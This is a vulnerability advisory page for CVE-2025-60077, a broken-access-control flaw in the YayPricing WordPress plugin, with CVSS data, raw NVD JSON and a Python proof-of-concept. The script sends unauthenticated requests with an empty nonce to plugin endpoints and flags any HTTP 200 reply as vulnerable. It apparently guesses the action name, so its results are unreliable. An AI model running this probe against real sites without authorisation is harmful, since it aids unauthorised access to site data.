Security Vulnerability Report
中文
CVE-2025-60077 CVSS 7.5 HIGH

CVE-2025-60077

Published: 2025-12-18 08:16:08
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in YayCommerce YayPricing yaypricing allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects YayPricing: from n/a through <= 3.5.3.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

YayPricing Plugin <= 3.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-60077 YayPricing Authorization Bypass PoC # Target: WordPress site with YayPricing plugin <= 3.5.3 def check_vulnerability(target_url): """ Check if the target YayPricing plugin is vulnerable to CVE-2025-60077 This vulnerability allows unauthorized access to privileged functionality """ # Try to access potentially protected YayPricing endpoints vulnerable_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/yaypricing/v1/" ] print(f"[*] Testing CVE-2025-60077 on {target_url}") print(f"[*] Target: YayPricing Plugin <= 3.5.3") print(f"[*] Vulnerability: Missing Authorization (Broken Access Control)") for endpoint in vulnerable_endpoints: try: # Send unauthenticated request headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) CVE-2025-60077-PoC', 'Content-Type': 'application/x-www-form-urlencoded' } # Try pricing-related actions that should require authorization data = { 'action': 'yay_pricing_get_data', 'nonce': '' # Empty nonce to test authorization bypass } response = requests.post(endpoint, data=data, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Potential vulnerable endpoint found: {endpoint}") print(f"[+] Response status: {response.status_code}") print(f"[+] Response preview: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {str(e)}") continue print("[*] No obvious vulnerability indicators found") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-60077-poc.py <target_url>") print("Example: python cve-2025-60077-poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60077", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:07.790", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in YayCommerce YayPricing yaypricing allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects YayPricing: from n/a through <= 3.5.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/yaypricing/vulnerability/wordpress-yaypricing-plugin-3-5-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}